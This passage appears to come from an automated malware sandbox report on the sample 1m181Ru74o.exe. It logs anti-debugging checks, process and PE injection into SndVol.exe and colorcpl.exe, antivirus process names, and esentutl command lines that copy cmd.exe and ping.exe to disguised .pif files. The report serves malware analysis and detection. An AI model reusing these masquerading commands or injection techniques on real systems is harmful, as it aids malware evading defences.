Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,	13_2_06D49496

Source: C:\Windows\SysWOW64\SndVol.exe	Window / User API: threadDelayed 3059	Jump to behavior
Source: C:\Windows\SysWOW64\SndVol.exe	Window / User API: threadDelayed 6534	Jump to behavior
Source: C:\Windows\SysWOW64\SndVol.exe	Window / User API: foregroundWindowGot 1761	Jump to behavior

Source: C:\Windows\SysWOW64\esentutl.exe

Dropped PE file which has not been started: C:\Users\Public\xpha.pif

Jump to dropped file

Source: C:\Windows\SysWOW64\SndVol.exe	API coverage: 5.1 %
Source: C:\Windows\SysWOW64\colorcpl.exe	API coverage: 2.7 %

Source: C:\Windows\SysWOW64\SndVol.exe TID: 8024	Thread sleep time: -84500s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\SndVol.exe TID: 8028	Thread sleep time: -9177000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\SndVol.exe TID: 8028	Thread sleep time: -19602000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\1m181Ru74o.exe	Code function: 0_2_02EB5908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,	0_2_02EB5908
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_0041A01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	9_2_0041A01B
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_0040B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	9_2_0040B28E
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_0040838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	9_2_0040838E
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_004087A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	9_2_004087A0
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_00407848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	9_2_00407848
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_004068CD FindFirstFileW,FindNextFileW,	9_2_004068CD
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_0044BA59 FindFirstFileExA,	9_2_0044BA59
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_0040AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	9_2_0040AA71
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_00417AAB FindFirstFileW,FindNextFileW,FindNextFileW,	9_2_00417AAB
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_0040AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	9_2_0040AC78
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_048E85E0 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	9_2_048E85E0
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_048E9538 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	9_2_048E9538
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_048E7665 FindFirstFileW,FindNextFileW,	9_2_048E7665
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_0492C7F1 FindFirstFileExA,	9_2_0492C7F1
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_048EC026 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	9_2_048EC026
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_048E9126 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	9_2_048E9126
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_048FADB3 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	9_2_048FADB3
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_048EB809 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	9_2_048EB809
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_048F8843 FindFirstFileW,	9_2_048F8843
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_048EBA10 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	9_2_048EBA10
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_0041A01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	13_2_0041A01B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_0040B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	13_2_0040B28E
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_0040838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	13_2_0040838E
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_004087A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	13_2_004087A0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_00407848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	13_2_00407848
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_004068CD FindFirstFileW,FindNextFileW,	13_2_004068CD
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_0044BA59 FindFirstFileExA,	13_2_0044BA59
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_0040AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	13_2_0040AA71
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_00417AAB FindFirstFileW,FindNextFileW,FindNextFileW,	13_2_00417AAB
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_0040AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	13_2_0040AC78
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_06D37665 FindFirstFileW,FindNextFileW,	13_2_06D37665
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_06D7C7F1 FindFirstFileExA,	13_2_06D7C7F1
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_06D385E0 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	13_2_06D385E0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_06D39538 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	13_2_06D39538
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_06D3C026 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	13_2_06D3C026
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_06D39126 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	13_2_06D39126
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_06D4ADB3 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	13_2_06D4ADB3
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_06D3BA10 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	13_2_06D3BA10
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_06D48843 FindFirstFileW,	13_2_06D48843
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_06D3B809 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	13_2_06D3B809

Source: C:\Windows\SysWOW64\SndVol.exe

Code function: 9_2_00406D28 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,

9_2_00406D28

Source: 1m181Ru74o.exe, 00000000.00000002.1424747239.000000000060E000.00000004.00000020.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1424747239.0000000000659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: 1m181Ru74o.exe, 00000000.00000002.1424747239.0000000000659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWN^
Source: Ntmftfld.PIF, 0000000B.00000002.1546846598.0000000000693000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllI
Source: SndVol.exe, 00000009.00000002.3762154701.0000000002ADD000.00000004.00000020.00020000.00000000.sdmp, Ntmftfld.PIF, 0000000E.00000002.1616931145.0000000000775000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\1m181Ru74o.exe	API call chain: ExitProcess graph end node			graph_0-32464
Source: C:\Windows\SysWOW64\SndVol.exe	API call chain: ExitProcess graph end node			graph_9-94465

Source: C:\Users\user\Desktop\1m181Ru74o.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Users\user\Desktop\1m181Ru74o.exe

Code function: 0_2_02ECF748 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,

0_2_02ECF748

Source: C:\Users\user\Desktop\1m181Ru74o.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\Public\Libraries\Ntmftfld.PIF	Process queried: DebugPort	Jump to behavior
Source: C:\Users\Public\Libraries\Ntmftfld.PIF	Process queried: DebugPort	Jump to behavior

Source: C:\Windows\SysWOW64\SndVol.exe

Code function: 9_2_004327AE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

9_2_004327AE

Source: C:\Users\user\Desktop\1m181Ru74o.exe

Code function: 0_2_02EC895C LoadLibraryW,GetProcAddress,FreeLibrary,

0_2_02EC895C

Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_004407B5 mov eax, dword ptr fs:[00000030h]	9_2_004407B5
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_048E1146 mov eax, dword ptr fs:[00000030h]	9_2_048E1146
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_048E1146 mov eax, dword ptr fs:[00000030h]	9_2_048E1146
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_0492154D mov eax, dword ptr fs:[00000030h]	9_2_0492154D
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_004407B5 mov eax, dword ptr fs:[00000030h]	13_2_004407B5
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_06D31146 mov eax, dword ptr fs:[00000030h]	13_2_06D31146
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_06D31146 mov eax, dword ptr fs:[00000030h]	13_2_06D31146
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_06D7154D mov eax, dword ptr fs:[00000030h]	13_2_06D7154D

Source: C:\Windows\SysWOW64\SndVol.exe

Code function: 9_2_00410763 SetLastError,GetNativeSystemInfo,SetLastError,GetProcessHeap,HeapAlloc,SetLastError,

9_2_00410763

Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_004327AE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	9_2_004327AE
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_004328FC SetUnhandledExceptionFilter,	9_2_004328FC
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_004398AC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	9_2_004398AC
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_00432D5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	9_2_00432D5C
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_04913546 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	9_2_04913546
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_04913694 SetUnhandledExceptionFilter,	9_2_04913694
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_0491A644 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	9_2_0491A644
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 9_2_04913AF4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	9_2_04913AF4
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_004327AE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	13_2_004327AE
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_004328FC SetUnhandledExceptionFilter,	13_2_004328FC
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_004398AC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	13_2_004398AC
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_00432D5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	13_2_00432D5C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_06D63694 SetUnhandledExceptionFilter,	13_2_06D63694
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_06D6A644 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	13_2_06D6A644
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_06D63546 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	13_2_06D63546
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 13_2_06D63AF4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	13_2_06D63AF4

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\1m181Ru74o.exe	Memory allocated: C:\Windows\SysWOW64\SndVol.exe base: 48E0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Ntmftfld.PIF	Memory allocated: C:\Windows\SysWOW64\colorcpl.exe base: 6D30000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Ntmftfld.PIF	Memory allocated: C:\Windows\SysWOW64\colorcpl.exe base: 7090000 protect: page execute and read and write	Jump to behavior

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\Desktop\1m181Ru74o.exe	Thread created: C:\Windows\SysWOW64\SndVol.exe EIP: 48E15CE	Jump to behavior
Source: C:\Users\Public\Libraries\Ntmftfld.PIF	Thread created: C:\Windows\SysWOW64\colorcpl.exe EIP: 6D315CE	Jump to behavior
Source: C:\Users\Public\Libraries\Ntmftfld.PIF	Thread created: C:\Windows\SysWOW64\colorcpl.exe EIP: 70915CE	Jump to behavior

Drops or copies cmd.exe with a different name (likely to bypass HIPS)

Source: C:\Windows\SysWOW64\esentutl.exe

File created: C:\Users\Public\alpha.pif

Jump to dropped file

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\1m181Ru74o.exe	Memory written: C:\Windows\SysWOW64\SndVol.exe base: 48E0000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\Public\Libraries\Ntmftfld.PIF	Memory written: C:\Windows\SysWOW64\colorcpl.exe base: 6D30000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\Public\Libraries\Ntmftfld.PIF	Memory written: C:\Windows\SysWOW64\colorcpl.exe base: 7090000 value starts with: 4D5A	Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\1m181Ru74o.exe	Memory written: C:\Windows\SysWOW64\SndVol.exe base: 48E0000	Jump to behavior
Source: C:\Users\Public\Libraries\Ntmftfld.PIF	Memory written: C:\Windows\SysWOW64\colorcpl.exe base: 6D30000	Jump to behavior
Source: C:\Users\Public\Libraries\Ntmftfld.PIF	Memory written: C:\Windows\SysWOW64\colorcpl.exe base: 7090000	Jump to behavior

Source: C:\Windows\SysWOW64\SndVol.exe	Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe		9_2_00410B5C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe		13_2_00410B5C

Source: C:\Windows\SysWOW64\SndVol.exe

Code function: 9_2_004175E1 mouse_event,

9_2_004175E1

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o			Jump to behavior

Source: SndVol.exe, 00000009.00000002.3762154701.0000000002ADD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager'
Source: SndVol.exe, 00000009.00000002.3762154701.0000000002ADD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerC
Source: SndVol.exe, 00000009.00000002.3762154701.0000000002ADD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: SndVol.exe, 00000009.00000002.3762154701.0000000002ADD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managero
Source: SndVol.exe, 00000009.00000002.3762154701.0000000002ADD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerM
Source: SndVol.exe, 00000009.00000002.3762154701.0000000002ADD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager,
Source: SndVol.exe, 00000009.00000002.3762154701.0000000002ADD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager1Z\
Source: SndVol.exe, 00000009.00000002.3762154701.0000000002ADD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: SndVol.exe, 00000009.00000002.3762154701.0000000002ADD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager5
Source: SndVol.exe, 00000009.00000002.3762154701.0000000002ADD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manageru
Source: SndVol.exe, 00000009.00000002.3762154701.0000000002ADD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerQ
Source: SndVol.exe, 00000009.00000002.3762154701.0000000002ADD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager2
Source: SndVol.exe, 00000009.00000002.3762154701.0000000002ADD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager}
Source: SndVol.exe, 00000009.00000002.3762154701.0000000002ADD000.00000004.00000020.00020000.00000000.sdmp, logs.dat.9.dr	Binary or memory string: [Program Manager]

Source: C:\Windows\SysWOW64\SndVol.exe

Code function: 9_2_004329DA cpuid

9_2_004329DA

Source: C:\Users\user\Desktop\1m181Ru74o.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	0_2_02EB5ACC
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Code function: GetLocaleInfoA,	0_2_02EBA7D4
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	0_2_02EB5BD8
Source: C:\Users\user\Desktop\1m181Ru74o.exe	Code function: GetLocaleInfoA,	0_2_02EBA820
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: EnumSystemLocalesW,	9_2_0044F17B
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: EnumSystemLocalesW,	9_2_0044F130
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: EnumSystemLocalesW,	9_2_0044F216
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	9_2_0044F2A3
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: GetLocaleInfoA,	9_2_0040E2BB
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: GetLocaleInfoW,	9_2_0044F4F3
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	9_2_0044F61C
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: GetLocaleInfoW,	9_2_0044F723
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	9_2_0044F7F0
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: EnumSystemLocalesW,	9_2_00445914
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: GetLocaleInfoW,	9_2_00445E1C
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	9_2_0044EEB8
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: GetLocaleInfoW,	9_2_049304BB
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	9_2_04930588
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: EnumSystemLocalesW,	9_2_049266AC
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	9_2_0493003B
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: GetLocaleInfoA,	9_2_048EF053
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: GetLocaleInfoW,	9_2_0493028B
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	9_2_049303B4
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	9_2_0492FC50
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: EnumSystemLocalesW,	9_2_0492FEC8
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: EnumSystemLocalesW,	9_2_0492FFAE
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: EnumSystemLocalesW,	9_2_0492FF13
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: GetLocaleInfoW,	9_2_04926BB4
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: EnumSystemLocalesW,	13_2_0044F17B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: EnumSystemLocalesW,	13_2_0044F130
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: EnumSystemLocalesW,	13_2_0044F216
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	13_2_0044F2A3
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetLocaleInfoA,	13_2_0040E2BB
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetLocaleInfoW,	13_2_0044F4F3
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	13_2_0044F61C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetLocaleInfoW,	13_2_0044F723
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	13_2_0044F7F0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: EnumSystemLocalesW,	13_2_00445914
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetLocaleInfoW,	13_2_00445E1C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	13_2_0044EEB8
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: EnumSystemLocalesW,	13_2_06D766AC
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetLocaleInfoW,	13_2_06D804BB
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	13_2_06D80588
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetLocaleInfoW,	13_2_06D8028B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	13_2_06D803B4
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetLocaleInfoA,	13_2_06D3F053
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	13_2_06D8003B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: EnumSystemLocalesW,	13_2_06D7FEC8
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: EnumSystemLocalesW,	13_2_06D7FFAE
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: EnumSystemLocalesW,	13_2_06D7FF13
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	13_2_06D7FC50
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetLocaleInfoW,	13_2_06D76BB4

Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\1m181Ru74o.exe

Code function: 0_2_02EB921C GetLocalTime,

0_2_02EB921C

Source: C:\Windows\SysWOW64\SndVol.exe

Code function: 9_2_004195F8 GetUserNameW,

9_2_004195F8

Source: C:\Windows\SysWOW64\SndVol.exe

Code function: 9_2_004466BF _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

9_2_004466BF

Source: C:\Users\user\Desktop\1m181Ru74o.exe

Code function: 0_2_02EBB79C GetVersionExA,

0_2_02EBB79C

Source: C:\Windows\SysWOW64\SndVol.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: 1m181Ru74o.exe, 00000000.00000003.1378273433.000000007E850000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1378549293.000000007EE50000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1456843128.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: cmdagent.exe
Source: 1m181Ru74o.exe, 00000000.00000003.1378273433.000000007E850000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1378549293.000000007EE50000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1456843128.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: quhlpsvc.exe
Source: 1m181Ru74o.exe, 00000000.00000003.1378273433.000000007E850000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1378549293.000000007EE50000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1456843128.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: avgamsvr.exe
Source: 1m181Ru74o.exe, 00000000.00000003.1378273433.000000007E850000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1378549293.000000007EE50000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1456843128.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: TMBMSRV.exe
Source: 1m181Ru74o.exe, 00000000.00000003.1378273433.000000007E850000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1378549293.000000007EE50000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1456843128.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Vsserv.exe
